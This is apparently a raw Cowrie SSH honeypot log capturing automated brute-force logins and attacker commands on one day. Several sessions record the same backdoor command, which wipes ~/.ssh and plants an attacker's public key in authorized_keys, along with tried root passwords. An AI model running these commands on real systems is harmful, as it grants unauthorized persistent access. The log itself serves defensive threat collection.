{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.041005Z","src_ip":"212.227.235.229","session":"aed7fc54d74f"}
{"eventid":"cowrie.login.success","username":"root","password":"AdminAdmin","message":"login attempt [root/AdminAdmin] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.115897Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.117092Z","src_ip":"212.227.235.229","session":"822e99e5c69e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.296549Z","src_ip":"212.227.235.229","session":"aed7fc54d74f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:06:38.695364Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.696181Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.697176Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:38.975338Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:06:39.588249Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:06:39.589060Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:06:39.867972Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:39.868944Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:06:39.988526Z","src_ip":"212.227.235.229","session":"aed7fc54d74f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33092,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa13b5faa6b0","protocol":"ssh","message":"New connection: 212.227.235.229:33092 (1.2.3.4:22) [session: aa13b5faa6b0]","sensor":"my-vps","timestamp":"2025-08-31T06:06:40.214922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:40.215823Z","src_ip":"212.227.235.229","session":"aa13b5faa6b0"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:40.249295Z","src_ip":"212.227.235.229","session":"06306e4d8581"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:40.250354Z","src_ip":"212.227.235.229","session":"aed7fc54d74f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:40.536773Z","src_ip":"212.227.235.229","session":"aa13b5faa6b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:06:41.821862Z","src_ip":"212.227.235.229","session":"aa13b5faa6b0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:43.146406Z","src_ip":"212.227.235.229","session":"aa13b5faa6b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34114,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e442e169a1b","protocol":"ssh","message":"New connection: 212.227.235.229:34114 (1.2.3.4:22) [session: 8e442e169a1b]","sensor":"my-vps","timestamp":"2025-08-31T06:06:43.465262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:43.466174Z","src_ip":"212.227.235.229","session":"8e442e169a1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:43.787093Z","src_ip":"212.227.235.229","session":"8e442e169a1b"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:06:45.112972Z","src_ip":"212.227.235.229","session":"8e442e169a1b"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:45.408939Z","src_ip":"212.227.235.229","session":"9b58ec2cf860"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:45.434444Z","src_ip":"212.227.235.229","session":"8e442e169a1b"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":38120,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6723e43b971","protocol":"ssh","message":"New connection: 43.159.36.188:38120 (1.2.3.4:22) [session: e6723e43b971]","sensor":"my-vps","timestamp":"2025-08-31T06:06:47.249333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:47.250276Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:47.497842Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.login.success","username":"root","password":"dh-qQ3j!soft","message":"login attempt [root/dh-qQ3j!soft] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:06:48.537567Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:06:49.452117Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:06:49.452868Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:06:49.454271Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:49.697293Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:06:50.212375Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:06:50.213145Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:06:50.455703Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:50.456544Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":38124,"dst_ip":"1.2.3.4","dst_port":22,"session":"ece6c87afde8","protocol":"ssh","message":"New connection: 43.159.36.188:38124 (1.2.3.4:22) [session: ece6c87afde8]","sensor":"my-vps","timestamp":"2025-08-31T06:06:50.699337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:50.700279Z","src_ip":"43.159.36.188","session":"ece6c87afde8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:50.944975Z","src_ip":"43.159.36.188","session":"ece6c87afde8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:06:51.964837Z","src_ip":"43.159.36.188","session":"ece6c87afde8"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:53.212689Z","src_ip":"43.159.36.188","session":"ece6c87afde8"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":38140,"dst_ip":"1.2.3.4","dst_port":22,"session":"a275c2f80c0a","protocol":"ssh","message":"New connection: 43.159.36.188:38140 (1.2.3.4:22) [session: a275c2f80c0a]","sensor":"my-vps","timestamp":"2025-08-31T06:06:53.475578Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:06:53.476262Z","src_ip":"43.159.36.188","session":"a275c2f80c0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:06:53.740275Z","src_ip":"43.159.36.188","session":"a275c2f80c0a"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:06:54.838926Z","src_ip":"43.159.36.188","session":"a275c2f80c0a"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:55.104141Z","src_ip":"43.159.36.188","session":"e6723e43b971"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:06:55.105031Z","src_ip":"43.159.36.188","session":"a275c2f80c0a"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"123456","message":"login attempt [oscar/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:07:00.709120Z","src_ip":"212.227.235.229","session":"bd2e9e2d73e6"}
{"eventid":"cowrie.session.closed","duration":"29.4","message":"Connection lost after 29.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:07:00.743511Z","src_ip":"212.227.235.229","session":"0851728b7aa8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50366,"dst_ip":"1.2.3.4","dst_port":22,"session":"02522b78fb76","protocol":"ssh","message":"New connection: 212.227.235.229:50366 (1.2.3.4:22) [session: 02522b78fb76]","sensor":"my-vps","timestamp":"2025-08-31T06:07:01.592781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:07:01.594066Z","src_ip":"212.227.235.229","session":"02522b78fb76"}
